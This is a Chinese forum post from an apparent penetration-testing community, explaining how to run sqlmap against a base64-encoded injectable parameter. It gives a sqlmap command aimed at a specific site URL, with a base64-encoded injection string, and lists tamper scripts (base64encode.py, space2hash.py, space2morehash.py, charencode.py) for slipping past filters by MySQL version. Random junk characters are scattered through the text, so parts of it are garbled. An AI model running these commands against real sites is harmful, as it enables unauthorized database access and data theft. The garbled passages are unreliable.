WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? sqlmap的tamper里有个base64encode.py ) Q0 `3 c, o I 使用如下 ! E3 L9 S+ o1 d sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs , @3 |/ T- y, ^- `, ]% e; _' o sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”6 w6 s( x% j5 N& {, { 其中常用到的bypass脚本绕过SQLMAP主要两个脚本: space2hash.py ,对于MYSQL数据库 4.0, 5.0注入) D7 b z) f+ _) O space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入 首先确定目标数据库版本,然后选择相应的脚本。- |8 q$ ?( l3 o -v 3 --batch --tamper "space2hash.py"% Q" S7 @5 U4 ]. _2 e2 \; z 还有其他一些插件:+ [' s1 J. B. E6 E encodes编码 ——charencode.py base64编码 —— base64encode.py 替换空格和关键字 —— halfversionedmorekeywords.py2 e: ~3 h: d8 z; H) M |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |